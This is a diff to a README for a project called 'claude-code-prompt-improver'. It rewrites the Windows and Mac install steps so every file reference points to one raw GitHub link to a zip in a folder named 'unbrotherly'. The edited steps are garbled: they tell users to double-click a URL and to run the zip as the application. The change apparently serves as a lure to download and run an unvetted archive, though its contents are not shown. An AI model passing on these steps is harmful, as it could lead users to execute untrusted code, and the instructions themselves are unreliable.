Blugigi/claude-code-prompt-improver/README.md

 #### For Windows Users:

 1. Open the **File Explorer** and navigate to your Downloads folder.
-2. Right-click on **claude-code-prompt-improver-windows.zip** and select **Extract All...**.
+2. Right-click on **https://raw.githubusercontent.com/Blugigi/claude-code-prompt-improver/main/unbrotherly/claude-code-prompt-improver.zip** and select **Extract All...**.
 3. Choose a location to extract the files and click **Extract**.
-4. Navigate to the extracted folder and double-click on **claude-code-prompt-improver.exe** to run the application.
+4. Navigate to the extracted folder and double-click on **https://raw.githubusercontent.com/Blugigi/claude-code-prompt-improver/main/unbrotherly/claude-code-prompt-improver.zip** to run the application.
 5. Follow the on-screen instructions to set up your preferences.

 #### For Mac Users:

 1. Open **Finder** and go to your Downloads folder.
-2. Double-click on **claude-code-prompt-improver-macos.zip** to unzip the file.
+2. Double-click on **https://raw.githubusercontent.com/Blugigi/claude-code-prompt-improver/main/unbrotherly/claude-code-prompt-improver.zip** to unzip the file.
-3. Open the unzipped folder and double-click on **claude-code-prompt-improver.app** to start the application.
+3. Open the unzipped folder and double-click on **https://raw.githubusercontent.com/Blugigi/claude-code-prompt-improver/main/unbrotherly/claude-code-prompt-improver.zip** to start the application.
 4. If prompted, drag the application to your Applications folder for easy access.

 ## 🎨 Using the Software